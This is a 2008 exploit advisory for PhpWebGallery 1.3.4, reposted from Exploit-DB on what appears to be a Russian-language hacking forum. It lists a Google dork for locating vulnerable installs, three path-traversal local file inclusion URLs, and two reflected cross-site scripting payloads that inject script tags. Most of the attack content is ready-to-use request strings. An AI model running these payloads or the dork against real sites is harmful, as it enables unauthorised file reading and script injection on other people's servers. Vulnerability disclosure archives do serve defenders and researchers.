Exploit PHPWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6425
Проверка EDB
  1. Пройдено
Автор
KHASHAYAR FEREIDANI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-4702 cve-2008-4591
Дата публикации
2008-09-11
Код:
----------------------------------------------------------------

Script : PhpWebGallery 1.3.4

Type : Multiple Vulnerabilities (XSS/LFI)

Rist : High

Google Dork : inurl:"picture.php?cat=" "Powered by PhpWebGallery 1.3.4"

----------------------------------------------------------------

Download From : http://puzzle.dl.sourceforge.net/sourceforge/phpwebgallery/phpwebgallery-1.3.4.tar.bz2

----------------------------------------------------------------

Discovered by : Khashayar Fereidani Or Dr.Crash

My Official Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Local File Inclusion Vulnerabilities :

Lfi 1 : http://example/include/init.inc.php?user[language]=../../[LFI]

Lfi 2 : http://example/include/init.inc.php?user[template]=../../[LFI]

Lfi 3 : http://example/include/isadmin.inc.php?user[language]=../../[LFI]

-----------------------------------------------------------------

Cross Site Scripting Vulnerabilities :

Xss 1 : http://example/admin/include/isadmin.inc.php?lang[access_forbiden]=<script>alert(123);</script>

Xss 2 : http://example/admin/include/isadmin.inc.php?lang[ident_title]=<script>alert(123);</script>

----------------------------------------------------------------

                        Tnx : God

          HTTP://IRCRASH.COM HTTP://FEREIDANI.IR

----------------------------------------------------------------

# milw0rm.com [2008-09-11]
 
Источник
www.exploit-db.com

Похожие темы